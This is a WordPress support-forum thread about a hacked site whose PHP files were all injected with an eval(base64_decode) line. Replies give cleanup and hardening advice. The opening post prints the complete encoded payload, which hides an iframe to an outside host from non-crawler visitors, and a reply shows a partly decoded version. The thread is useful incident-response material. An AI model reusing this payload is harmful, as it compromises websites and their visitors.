Support » Fixing WordPress » eval(base64_decode HACKED

  • Resolved alisamazing

    (@alisamazing)


    guys,

    I’m having a nightmare, I’ve just had a look on my dashboard and it doesn’t look right… everything is there but it is not styled. I then looked at code via the appearance>editor option and notice that every single .php file has been altered by the “eval(base64_decode” etc.
    Here is what it looks like:-

    <?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ==”));?>

    That is the first line in every .php file.

    My site doesn’t look to be affected crazycreatures.org
    I always keep up to date with wordpress I run 2.9.1
    I use the Atahualpa Theme (could this be the cause?)

    What steps do I take on WordPress? (I have already exported an XML today)
    What steps do I take on my host (godaddy.com)?

    I read somewhere that I need to backup databases and stuff I am not familiar with code and stuff can someone please advise in baby steps? Also it seems other people had a similar issue with this code on their PermaLinks, mine look fine.

    Any advice whatsoever greatly appreciated.

    Thanks

Viewing 12 replies - 1 through 12 (of 12 total)
  • argh….I hate that! You are in for a bit of a long day…
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://www.snipe.net/2010/01/when-wordpress-gets-hacked/

    And when you’re done:
    http://codex.wordpress.org/Hardening_WordPress

    that reading will help you out. You need to delete the gibberesh from your wp-config file. Reinstall WP (you might still be able to do it from your admin dashboard if you are lucky, if not, do a manual install). Once you have the new WP in place, delete all plugins and reinstall from clean downloads. Then reinstall your theme(s). If you have a heavily customized theme with no backup, you have to manually clean each file.

    That will get your WP clean. Then change ALL passwords (wp, db, ftp)

    Then you need to find out how this is happening. If you have godaddy, you have access to your server access logs. Look at the timestamp on a PHP file that was hacked. Now look at your server logs at that time/date and see how your files were accessed. Chances are, your logs will lead you to a rogue php file, or maybe more than one. Delete any files that don’t belong.

    And finally, if you have any more php files on your server (besides WP) investigate them. They probably are all hacked and will need replaced or cleaned. good luck!

    Thread Starter alisamazing

    (@alisamazing)

    Thanks for the swift reply RVoodoo

    I’m backing up MySQL databases now, it is a lot of work and very time consuming.

    Will it be possible to recreate my site exactly like it was before or will there be noticeable differences as far as the visitor is concerned. Also, I imagine all this will require resubmitting sitemaps and such to google analytics etc.?

    Will let you know how it turns out.

    Thanks

    you should be able to get things just the way they were. If you are lucky, your database did not get harmed. Just make sure you are very thorough. If you miss something, you may find yourself doing all this again in a week.

    Also, once all is clean….keep backups of all files, and of your DB….that way in the future, if something goes south, you can just delete all the harmed stuff and use your clean copies.

    so what does the above code do exactly?

    here it is decoded:

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
    Formatted version: http://wordpress.pastebin.ca/1791392

    Thread Starter alisamazing

    (@alisamazing)

    I noticed that ‘samboll’ had this in the decode

    } } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){

    Before I posted here I thought a reinstall of 2.9.1 might help. So I did this via the Dashboard automatically. It told me the reinstall was successful, however it had a Warning.

    Warning: gzuncompress() [function.gzuncompress]: data error in /home/content/81/5291081/html/wp-includes/http.php on line 1825

    I guess this will be related??

    it most likely related to the hack…yes.

    Last time I cleaned up, I had to reinstall WP….that got things working pretty well. Then reinstalled my theme and plugins which got rid of all warnings (My dashboard still looked bad, until I did a browser refresh ctrl+f5). Then I cleaned up my wp-config, as that file doesn’t get replaced on an upgrade and still had the dirty code in it…..

    After that all was well…..

    Thread Starter alisamazing

    (@alisamazing)

    Okay guys, thanks for your help so far, It looks a lot cleaner now and haven’t seen any strange behaviour but following the info here:
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

    I checked my .htaccess file.

    Apparantly it should be:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    Mine is:

    rewriteengine on

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress
    rewritecond %{REQUEST_FILENAME} !-f
    rewritecond %{REQUEST_FILENAME} !-d
    rewriterule . /index.php [L]

    Can I get rid of that rewrite stuff (with lowercase r)?

    Thanks all.

    I think I would delete the .htaccess entirely and then regenerate your permalinks with the same you have
    admin – settings – permalinks

    I did a search on <?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ and found this in Google Cache. Looks like the same code:

    http://74.125.95.132/search?q=cache:tL9ahEm5aqwJ:moodle.org/mod/forum/discuss.php%3Fd%3D111453+%3C%3Fphp+/**/+eval%28base64_decode%28%22aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZ&cd=1&hl=en&ct=clnk&gl=us

    Have you tried installing the antivirus WP plugin? You can do a manual scan of your theme templates to help identify the code. If not, you can download it here: http://wordpress.org/extend/plugins/antivirus/

    Hi Samuel, I saw you helped a lot of people decoding the footer.

    I read lots of articles how to decode but I cant do it, would you be so kind in decoding my footer please?

    And could you tell me then how you did it_

    thanks

    [Code moderated as per the Forum Rules. Please use the pastebin]

    There are a number of ones on the web. Try this one:
    http://www.tareeinternet.com/scripts/decrypt.php
    or Google for: base64 decoder

Viewing 12 replies - 1 through 12 (of 12 total)
  • The topic ‘eval(base64_decode HACKED’ is closed to new replies.